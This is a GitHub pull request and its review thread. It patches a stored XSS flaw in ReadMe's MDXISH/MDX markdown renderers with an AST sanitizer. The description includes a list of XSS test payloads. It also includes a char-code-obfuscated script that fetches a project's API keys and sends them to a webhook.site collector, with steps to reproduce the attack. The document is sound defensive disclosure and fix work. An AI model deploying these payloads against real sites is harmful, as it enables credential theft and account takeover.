fix: sanitize raw HTML in MDXISH & MDX renderers by eaglethrost · Pull Request #1526 · readmeio/markdown

eaglethrost · 2026-06-26T09:46:28Z

🎫 Resolve RM-17024

🎯 What does this PR do?

Context

There was a reported vulnerability where a stored XSS in the hub docs renderer lets a non-owner put raw HTML in a guide body that runs JS in any viewer's session (incl. the owner's). From there an attacker reads same-origin endpoints (…/apikeys, …/projects/me) and exfiltrates the live API key + custom_login.jwt_secret → project takeover. Reported payload: <math><mtext><script>…</script></mtext></math>.

Root cause: raw HTML was never sanitized on the new engines:

mdxish runs rehypeRaw (raw HTML → real elements) with no sanitizer after it.
MDX compile only sanitizes when format === 'md'; main docs render in the default MDX format, which was not sanitized.
The legacy / md path was already protected by rehype-sanitize.

Correction to the report: it assumed bare <script> was already stripped and only MathML bypassed it. On mdxish & MDX (any non-md format) nothing is stripped: bare <script>, <img onerror>, and javascript: URLs all execute, and the MathML wrapper isn't required (verified against the pipeline). So a MathML-only patch would've been insufficient.

Fix

Sanitize the rendered content at the AST level. Created an AST-level stripper shared by both the mdxish and MDX compile pipelines:

Removes script/foreign-content/resource-loading host elements.
Strips on* handlers and javascript:/vbscript:/executable-data: URLs (incl. whitespace/control-char obfuscation).
Handles both node shapes: hast element (mdxish/md) and MDX JSX (mdxJsxFlowElement/mdxJsxTextElement).
Leaves PascalCase components untouched (their on*/url values are React props) but recurses through them so nested raw HTML is still cleaned.
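
The four points above can be sketched on a hast-like tree as follows. This is a minimal illustration, not the code in dangerous-html.ts: the node types are declared locally, and the tag subset, the `URL_PROPS` set, the `data:text/html` rule, and the bodies of `isDangerousUrl` and `stripDangerous` are assumptions made for the example.

```typescript
// Minimal hast-like node shapes, declared locally so the sketch has no dependencies.
type TextNode = { type: 'text'; value: string };
type ElementNode = {
  type: 'element';
  tagName: string;
  properties: Record<string, unknown>;
  children: TreeNode[];
};
type TreeNode = TextNode | ElementNode;
type RootNode = { type: 'root'; children: TreeNode[] };

// Illustrative subset only; the PR keeps its real list in DANGEROUS_TAG_NAMES.
const DANGEROUS_TAGS = new Set(['script', 'iframe', 'object', 'svg', 'math', 'link', 'meta', 'base']);
// Assumed set of URL-bearing property names (hast uses camelCase property names).
const URL_PROPS = new Set(['href', 'src', 'action', 'formAction', 'xLinkHref']);

const isComponentName = (name: string): boolean => /^[A-Z]/.test(name);

// Remove whitespace and control characters before testing the scheme, so
// "java\tscript:" is treated the same as "javascript:".
const isDangerousUrl = (value: string): boolean =>
  /^(?:javascript:|vbscript:|data:text\/html)/i.test(value.replace(/[\u0000-\u0020\u007f]/g, ''));

function stripDangerous(parent: RootNode | ElementNode): void {
  // 1. Drop dangerous host elements together with their whole subtree.
  parent.children = parent.children.filter(
    child =>
      !(
        child.type === 'element' &&
        !isComponentName(child.tagName) &&
        DANGEROUS_TAGS.has(child.tagName.toLowerCase())
      ),
  );

  for (const child of parent.children) {
    if (child.type !== 'element') continue;
    // 2. Clean attributes on host elements only; component props are left alone.
    if (!isComponentName(child.tagName)) {
      for (const key of Object.keys(child.properties)) {
        const value = child.properties[key];
        const isHandler = /^on/i.test(key);
        const isBadUrl = URL_PROPS.has(key) && typeof value === 'string' && isDangerousUrl(value);
        if (isHandler || isBadUrl) delete child.properties[key];
      }
    }
    // 3. Recurse through every surviving element, components included.
    stripDangerous(child);
  }
}
```

Removing the whole subtree of a dangerous element (rather than unwrapping it) is what keeps a `<script>` nested inside `<math>` from surviving in this sketch.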

Considerations & decisions

Denylist, not allowlist: hast-util-sanitize (the md path) is allowlist-based and would strip every custom component + prop, which is why it's md-only. mdxish/MDX trees have first-class component nodes, so a denylist that preserves them is the fit. Trade-off: a denylist can miss a novel vector (see CSP below).
Why not use other libraries like DOMPurify? It sanitizes HTML strings/DOM, not our AST: using it would mean a lossy serialize→reparse, would strip all MDX components, can't see MDX JSX nodes, and needs jsdom on the server render path.

Note

This sanitisation is not applied to HTMLBlocks, since those are meant for more deliberate HTML execution. For MDXISH & MDX, scripts are stripped by default anyway.

What no longer works (intended)

This affects mdxish/MDX docs with hand-authored raw HTML (all already blocked on md/legacy): inline <style>, raw <iframe> (use the Embed component), inline <svg>/<math>, <object>/<link>/<meta>/<base>, inline on* handlers, javascript: URLs. If an MDXISH or MDX doc uses any of this HTML, it will no longer work!

To discuss

Soften iframe/svg? Currently removed wholesale (parity with md); all stripped tags are listed in DANGEROUS_TAG_NAMES in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to.
CSP on hub doc pages (readme repo): The report mentions updating CSP, but that's not in scope of this work. I believe this PR would already block script execution so we don't necessarily need that change, but it would be good to have.
Still-open (out of scope): component dangerouslySetInnerHTML sinks (HTMLBlock)

🧪 QA tips

End-to-end in the readme app

Locally link this branch to readme

mdxish guide: paste the sample below → ✅ no alert, no apikeys/network request, no frames/SVG, page styling unaffected; the control block (bold/links/code/div/callout) renders.
MDX doc (default format, not md): same content (note the <style>{ } block hits a pre-existing MDX compile error from CSS braces — use the @import variant, or test <style> alone) → same result.
Non-breakage: existing <Callout>/<Tabs>/<Image>/<Embed>/[block:embed], table alignment, inline style=/class=, normal markdown all render unchanged.

Sample doc content

# Sanitizer QA

<script>alert(document.domain)</script>

<img src="x" onerror="alert(document.domain)" />

<a href="javascript:alert(document.domain)">click</a>

<math><mtext><script>alert(document.domain)</script></mtext></math>

<svg><script>alert(document.domain)</script></svg>

<svg width="200" height="40"><a xlink:href="javascript:alert(document.domain)"><text x="10" y="25">svg link</text></a></svg>

<iframe src="javascript:alert(document.domain)"></iframe>

<style>* { color: red !important; }</style>

<style>@import "https://example.com/deface.css"</style>

<!-- controls that SHOULD still render -->
**bold**, [normal link](https://example.com), `code`

<div class="note" style="border:1px solid #888">plain div, kept</div>

> 📘 callout, kept

After the fix every block above is inert; only the bold / link / code / div / callout controls render.

How to Replicate the Vulnerability in the report:

Go to a doc in an MDXISH or MDX project
Paste content of this form:

<math><mtext><script>fetch(String.fromCharCode(47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,45,110,101,120,116,47,118,50,47,112,114,111,106,101,99,116,115,47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,107,101,121,115)).then(function(r){return r.text()}).then(function(t){new Image().src=String.fromCharCode(104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,115,105,116,101,47,55,102,97,55,52,51,101,57,45,52,52,97,100,45,52,98,51,97,45,57,54,54,54,45,48,57,50,56,51,51,48,99,49,50,56,51,47,75,69,89,83,63,100,61)+encodeURIComponent(t)})</script></mtext></math>

1st String.fromCharCode(...) decodes to /<project>/api-next/v2/projects/<project>/apikeys (here with the test project testing-pcyq), the API-keys endpoint, reachable same-origin on the hub.
2nd String.fromCharCode(...) decodes to the attacker's collector URL. I generated one with the online webhook generator at webhook.site; use your own URL from there and convert it to char codes.

Open the webhook.site page & track requests coming in
View the page, refresh several times. You should notice requests coming in, containing the project keys
The network tab will show a network call to apikeys
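
To check what the first String.fromCharCode(...) call resolves to, and to encode your own collector URL for step 2, a small sketch like the one below should do. The char codes are copied from the payload above; `toCharCodes` is a hypothetical helper name introduced here for illustration.

```typescript
// Char codes copied from the first String.fromCharCode(...) call in the payload.
const pathCodes: number[] = [
  47, 116, 101, 115, 116, 105, 110, 103, 45, 112, 99, 121, 113, 47, 97, 112, 105, 45, 110, 101, 120,
  116, 47, 118, 50, 47, 112, 114, 111, 106, 101, 99, 116, 115, 47, 116, 101, 115, 116, 105, 110, 103,
  45, 112, 99, 121, 113, 47, 97, 112, 105, 107, 101, 121, 115,
];

// Decoding: each number is a UTF-16 code unit.
const decodedPath: string = String.fromCharCode(...pathCodes);
// decodedPath === '/testing-pcyq/api-next/v2/projects/testing-pcyq/apikeys'

// Encoding (hypothetical helper): turn any ASCII URL into the comma-separated
// list that String.fromCharCode(...) expects.
const toCharCodes = (text: string): number[] => text.split('').map(ch => ch.charCodeAt(0));
```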

This is what it would look like in the app:

Screen.Recording.2026-06-26.at.10.44.54.pm.mov

📸 Screenshot or Loom

Before
In this demo, notice how in MDXISH & MDX, scripts, iframes, and SVG get executed on view.

Screen.Recording.2026-06-26.at.8.07.06.pm.mov

After
None of those top-level tags execute.

Screen.Recording.2026-06-26.at.8.08.11.pm.mov

eaglethrost · 2026-06-26T13:33:13Z


-  // TODO: Skipped about the mdxish engine fails this test since it wraps the <pre> in a <p> tag
-  // Rendering looks correct, so skip this for now until we decide if we want to fix this or not
-  it.skip.each(renderingEngines)('%s: renders the html in a `<pre>` tag if safeMode={true}', (_label, renderContent) => {


This is now resolved

eaglethrost · 2026-06-26T13:34:50Z

+ * load remote resources, or open a foreign-content (MathML/SVG) parsing context
+ * that lets `<script>` survive namespace-confusion bypasses.
+ */
+const DANGEROUS_TAG_NAMES = new Set([


From research, it seems that these are the main dangerous tags that might expose an XSS vulnerability. The list is quite extensive.

If we've got object and applet should we also have embed?

Yeah good point!

Wait, sorry, actually legacy magic block embeds translate to raw embeds, so I don't think we can strip it, at least for mdxish 😢 . It might be worth transforming them to our Embed component, but we need to ensure the previous rendering logic is retained.

eaglethrost · 2026-06-26T13:35:17Z

+
+// PascalCase names are custom React components (e.g. `<Callout>`), not host
+// elements; their `on*`/url-like values are component props, not DOM handlers.
+const isComponentName = (name: string): boolean => /^[A-Z]/.test(name);


The main thing to be careful about is that we don't sanitise custom MDX components accidentally.
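
As a rough illustration of that guard, the sketch below combines `isComponentName` (copied from the diff above) with a hypothetical `shouldStripHandler` helper; the helper name and its exact rule are assumptions, not the PR's code.

```typescript
// Copied from the diff: PascalCase names are treated as custom components.
const isComponentName = (name: string): boolean => /^[A-Z]/.test(name);

// Hypothetical helper: an on* attribute is only stripped on host elements.
const shouldStripHandler = (tagName: string, attrName: string): boolean =>
  !isComponentName(tagName) && /^on/i.test(attrName);

const decisions = [
  shouldStripHandler('img', 'onerror'), // host element, DOM handler: strip
  shouldStripHandler('Callout', 'onClick'), // component, React prop: keep
  shouldStripHandler('div', 'id'), // host element, harmless attribute: keep
];
```

Note that a lowercase tag such as `callout` would be classified as a host element under this rule, so the guard relies on components being authored in PascalCase.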

eaglethrost · 2026-06-26T13:36:01Z

      },
    ]);
    rehypePlugins.push([rehypeSanitize, sanitizeSchema]);
+  } else {


Seems like the main MDX path has never sanitised these scripts. They don't get executed during compilation, but later during execution.

kevinports

RE:

Soften iframe/svg? Currently removed wholesale (parity with md); all stripped tags are listed in DANGEROUS_TAG_NAMES in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to.

I'm inclined to allow SVG here because it's a common image format people inline in an html doc. I think we'd still have attribute-level sanitization which should cover our bases there?

It seems like for iframe we could strip them and tell folks to use the Embed block for this right?

kevinports · 2026-06-29T15:22:04Z

+ * load remote resources, or open a foreign-content (MathML/SVG) parsing context
+ * that lets `<script>` survive namespace-confusion bypasses.
+ */
+const DANGEROUS_TAG_NAMES = new Set([


If we've got object and applet should we also have embed?

kevinports · 2026-06-29T15:26:09Z

+
+  if (isMdxJsxElement(node) && node.attributes) {
+    node.attributes = node.attributes.filter(attr => {
+      if (attr.type !== 'mdxJsxAttribute' || typeof attr.name !== 'string') return true; // keep `{...spread}`


I don't follow this "// keep {...spread}" comment.

Does this mean a spread like {...{onclick: 'alert(1)'}} will survive sanitization?

Yes, it will, since we don't sanitise expressions yet. This PR is for top-level script tags and attribute/property sanitisation. We can extend it to expressions, but would need to be careful not to accidentally strip legit content in them.
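
The behaviour discussed in this thread can be sketched as below. The attribute shapes follow the `mdxJsxAttribute` / `mdxJsxExpressionAttribute` node types but are declared locally, and `filterAttributes` is an illustrative stand-in for the filter in the diff, reduced to the on* rule.

```typescript
// Local stand-ins for the MDX JSX attribute node shapes.
type MdxJsxAttribute = { type: 'mdxJsxAttribute'; name: string; value: string | null };
type MdxJsxExpressionAttribute = { type: 'mdxJsxExpressionAttribute'; value: string };
type JsxAttribute = MdxJsxAttribute | MdxJsxExpressionAttribute;

function filterAttributes(attributes: JsxAttribute[]): JsxAttribute[] {
  return attributes.filter(attr => {
    // A spread has no name and its contents are an opaque expression, so it is kept as-is.
    if (attr.type !== 'mdxJsxAttribute') return true;
    // Named attributes: drop inline event handlers.
    return !/^on/i.test(attr.name);
  });
}

const cleaned = filterAttributes([
  { type: 'mdxJsxAttribute', name: 'onclick', value: 'alert(1)' },
  { type: 'mdxJsxAttribute', name: 'id', value: 'safe' },
  { type: 'mdxJsxExpressionAttribute', value: "...{onclick: 'alert(1)'}" },
]);
// `cleaned` keeps `id` and the spread; only the named `onclick` is removed.
```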

kevinports · 2026-06-29T15:30:24Z

This plugin factory could probably just live at the bottom of dangerous-html.ts instead of a separate file for this wrapper.

kevinports · 2026-06-29T15:31:18Z

Should there be some unit tests that cover this function directly?

Yep good point!

coderabbitai · 2026-06-30T07:38:20Z

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 8780ac8a-4e8e-4e88-be90-cc824baa508b

📥 Commits

Reviewing files that changed from the base of the PR and between 26e7f0f and 1b2b2c9.

📒 Files selected for processing (1)

lib/compile.ts

🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

readmeio/ai (manual)
readmeio/gitto (manual)
readmeio/markdown (manual)
readmeio/readme (manual) → reviewed against branch dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml instead of the default branch

🚧 Files skipped from review as they are similar to previous changes (1)

lib/compile.ts

Walkthrough

This PR adds a rehype plugin, stripDangerousHtml, that removes dangerous HTML elements and unsafe attributes from HAST and MDX JSX trees. It is wired into the compile path for non-md formats and into mdxish after rehypeRaw. The compile pipeline also now merges caller-provided remark/rehype plugins explicitly. New tests cover the plugin directly, both sanitization pipelines, and the previously skipped HTMLBlock safeMode case.

Changes

Related issues: None provided.
Related PRs: None provided.
Suggested labels: security, tests
Suggested reviewers: None provided.

Sequence Diagram(s)

sequenceDiagram
  participant compile as compile()
  participant mdxish as mdxish()
  participant plugin as rehypeStripDangerousHtml
  participant tree as HAST/MDX tree

  compile->>plugin: add to non-md rehypePlugins
  mdxish->>plugin: run after rehypeRaw
  plugin->>tree: visit nodes
  plugin->>tree: remove dangerous elements and attributes
  plugin-->>compile: sanitized output
  plugin-->>mdxish: sanitized output

coderabbitai

Actionable comments posted: 3

🧹 Nitpick comments (2)

__tests__/lib/compile-sanitize.test.tsx (1)
29-32: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add explicit vbscript: and dangerous data: payloads here.

The current fixture only feeds javascript: into execute(), so a regression on the other blocked schemes would still pass. Add concrete inputs for those schemes to lock in the full URL-sanitization contract.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/lib/compile-sanitize.test.tsx` around lines 29 - 32, The
compile-sanitize test only exercises the javascript: case, so it does not
protect the full URL-sanitization contract. Update the test in
compile-sanitize.test.tsx around the execute() fixture to include explicit
vbscript: and dangerous data: payload inputs alongside the existing javascript:
case, and keep the href assertions in the same test so it verifies all blocked
schemes remain non-executable.
__tests__/processor/plugin/dangerous-html.test.ts (1)
124-134: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add a regression for expression-valued URL attributes.

The MDX JSX tests only cover string URL values. Add a host-element case where href or formAction is an expression node resolving to a dangerous scheme, matching the sanitizer gap above.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/processor/plugin/dangerous-html.test.ts` around lines 124 - 134,
The MDX JSX dangerous-attribute tests only cover string-valued URL props, so add
a regression in dangerous-html.test.ts for host JSX elements whose href or
formAction is an expression node resolving to a javascript: (or other dangerous)
URL. Update the MDX JSX section alongside the existing jsx() /
stripDangerousHtml(root(node)) case to assert that expression-valued URL
attributes are also removed while safe attributes like id remain.
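
One possible shape for the extra scheme coverage requested in the first nitpick is a table of inputs checked against a URL predicate. The sketch below is not the repository's test or its `isDangerousUrl`; the normalisation rule and the `data:text/html` check are assumptions based on the PR description ("javascript:/vbscript:/executable-data: URLs, incl. whitespace/control-char obfuscation").

```typescript
// Assumed normalisation: drop whitespace/control characters, then lowercase.
const normalizeUrl = (url: string): string => url.replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();

// Assumed predicate: script schemes plus HTML-carrying data: URLs.
const isDangerousUrl = (url: string): boolean =>
  /^(?:javascript:|vbscript:|data:text\/html)/.test(normalizeUrl(url));

// [input, expected verdict]
const schemeCases: Array<[string, boolean]> = [
  ['javascript:alert(1)', true],
  ['vbscript:msgbox(1)', true],
  ['data:text/html,<script>alert(1)</script>', true],
  ['java\tscript:alert(1)', true], // control-character obfuscation
  [' JaVaScRiPt:alert(1)', true], // leading space and mixed case
  ['https://example.com', false],
  ['data:image/png;base64,AAAA', false],
  ['/docs/javascript:intro', false], // scheme-like text that is not at the start
];

const failures = schemeCases.filter(([input, expected]) => isDangerousUrl(input) !== expected);
```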

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@__tests__/lib/mdxish/sanitize-raw-html.test.ts`:
- Around line 109-118: The test around mdxish sanitization is over-preserving
dangerous URL props on PascalCase components. Update the behavior in the mdxish
sanitize path and the corresponding expectation in sanitize-raw-html.test.ts so
custom components like TestComponent still keep safe props such as onClick but
do not retain javascript: values on href/src-style URL props unless they are
explicitly allowlisted. Use the existing mdxish and findElementByTagName test
setup to verify the dangerous prop is stripped or blocked instead of locked in.

In `@lib/compile.ts`:
- Around line 83-87: The `compile` path currently lets `...opts` override
`rehypePlugins`, which can drop `rehypeStripDangerousHtml` from the MDX
pipeline. Update the `compile` function so caller options are merged before the
explicit plugin list, or otherwise ensure user-supplied `rehypePlugins` are
appended while `rehypeStripDangerousHtml` is always added last. Use the
`compile` function and the `rehypePlugins`/`rehypeStripDangerousHtml` symbols to
locate the fix.

In `@processor/plugin/dangerous-html.ts`:
- Around line 129-134: The MDX attribute sanitizer in dangerous-html.ts only
rejects dangerous URL values when they are strings, so host elements can still
receive non-string URL props like href expressions. Update the filter inside the
node.attributes processing to treat any URL-bearing attribute on host MDX
elements as unsafe unless it is a clearly safe string literal, using the
existing helpers isUrlAttribute and isDangerousUrl in the attr.name/attr.value
check.
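
A stricter filter along the lines of the last inline comment could look like the sketch below. `isUrlAttribute` and `isDangerousUrl` are named in the comment, but their bodies here, the `URL_ATTRS` set, and the `keepHostUrlAttribute` helper are assumptions for illustration.

```typescript
// Local stand-ins for MDX JSX attribute values: a string literal, a bare
// attribute (null), or an expression such as href={someValue}.
type AttributeValue = string | null | { type: 'mdxJsxAttributeValueExpression'; value: string };
type NamedAttribute = { type: 'mdxJsxAttribute'; name: string; value: AttributeValue };

const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'xlink:href']);
const isUrlAttribute = (name: string): boolean => URL_ATTRS.has(name.toLowerCase());
const isDangerousUrl = (url: string): boolean =>
  /^(?:javascript:|vbscript:|data:text\/html)/i.test(url.replace(/[\u0000-\u0020\u007f]/g, ''));

// Decides whether an attribute on a host (lowercase) JSX element is kept.
function keepHostUrlAttribute(attr: NamedAttribute): boolean {
  if (!isUrlAttribute(attr.name)) return true;
  // Only a plain string literal can be verified statically; expression-valued
  // or bare URL attributes are dropped rather than trusted.
  return typeof attr.value === 'string' && !isDangerousUrl(attr.value);
}
```

The trade-off is that a legitimate `href={someVariable}` on a host element would also be removed under this rule.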

ℹ️ Review info

📥 Commits

Reviewing files that changed from the base of the PR and between d94d9ff and 31035c3.

📒 Files selected for processing (8)

__tests__/components/HTMLBlock.test.tsx
__tests__/lib/compile-sanitize.test.tsx
__tests__/lib/mdxish/sanitize-raw-html.test.ts
__tests__/processor/plugin/dangerous-html.test.ts
lib/compile.ts
lib/mdxish.ts
package.json
processor/plugin/dangerous-html.ts

coderabbitai

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@lib/compile.ts`:
- Around line 70-75: The remark plugin merge order in compile() is wrong because
userRemarkPlugins are added before tailwindTransformer, allowing caller plugins
to run on the pre-Tailwind AST. Update the plugin assembly in lib/compile.ts so
tailwindTransformer is inserted before appending userRemarkPlugins, keeping the
intended order in the remarkPlugins array.
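
The ordering concerns raised in the two compile.ts comments (caller rehype plugins must not displace the sanitizer, and caller remark plugins should come after tailwindTransformer) can be sketched as below. Plugins are represented by name only; `assemblePlugins`, `builtinRemark`, and `builtinRehype` are hypothetical placeholders, and whether tailwindTransformer is always present is an assumption.

```typescript
interface CompileOptions {
  format?: 'md' | 'mdx';
  remarkPlugins?: string[];
  rehypePlugins?: string[];
}

function assemblePlugins(opts: CompileOptions = {}): { remarkPlugins: string[]; rehypePlugins: string[] } {
  const { format = 'mdx', remarkPlugins: userRemark = [], rehypePlugins: userRehype = [] } = opts;

  // Built-in remark transforms first, tailwindTransformer next, caller plugins after it.
  const remarkPlugins = ['builtinRemark', 'tailwindTransformer', ...userRemark];

  // The sanitizer is appended last, so caller plugins cannot replace it or run after it.
  const sanitizer = format === 'md' ? 'rehypeSanitize' : 'rehypeStripDangerousHtml';
  const rehypePlugins = ['builtinRehype', ...userRehype, sanitizer];

  return { remarkPlugins, rehypePlugins };
}

const assembled = assemblePlugins({ remarkPlugins: ['userRemark'], rehypePlugins: ['userRehype'] });
```

Destructuring the plugin arrays out of the options, instead of spreading `...opts` over the final configuration, is what prevents a caller-supplied `rehypePlugins` from overwriting the built-in list in this sketch.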

ℹ️ Review info

📥 Commits

Reviewing files that changed from the base of the PR and between 31035c3 and 26e7f0f.

📒 Files selected for processing (5)

__tests__/lib/compile-sanitize.test.tsx
__tests__/lib/mdxish/sanitize-raw-html.test.ts
__tests__/processor/plugin/dangerous-html.test.ts
lib/compile.ts
processor/plugin/dangerous-html.ts

✅ Files skipped from review due to trivial changes (1)

__tests__/lib/mdxish/sanitize-raw-html.test.ts

🚧 Files skipped from review as they are similar to previous changes (3)

__tests__/lib/compile-sanitize.test.tsx
__tests__/processor/plugin/dangerous-html.test.ts
processor/plugin/dangerous-html.ts

feat: sanitize mdxish & mdx

15b76ac

github-advanced-security AI found potential problems Jun 26, 2026

Comment thread __tests__/lib/compile-sanitize.test.tsx Fixed

fix: github test

c2d6449

eaglethrost changed the title ~~fix: sanitize raw HTML in mdxish & MDX renderers (stored XSS)~~ fix: sanitize raw HTML in MDXISH & MDX renderers Jun 26, 2026

eaglethrost requested a review from a team June 26, 2026 13:03

fix: tests, remove style

d771030

eaglethrost commented Jun 26, 2026

eaglethrost added 2 commits June 29, 2026 12:26

test: enhance

f3957e3

chore: improvements

053eb40

kevinports reviewed Jun 29, 2026

fix: tests & code structure comments

31035c3

coderabbitai Bot requested changes Jun 30, 2026

Comment thread __tests__/lib/mdxish/sanitize-raw-html.test.ts Outdated

Comment thread lib/compile.ts

Comment thread processor/plugin/dangerous-html.ts

eaglethrost added 3 commits July 1, 2026 16:34

chore: coderabbit comments

df6d12e

Merge branch 'next' into dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml

1c9ef15

fix: remove embed

26e7f0f

coderabbitai Bot requested changes Jul 1, 2026

Comment thread lib/compile.ts Outdated

fix: move remark plugins

1b2b2c9

coderabbitai Bot approved these changes Jul 1, 2026
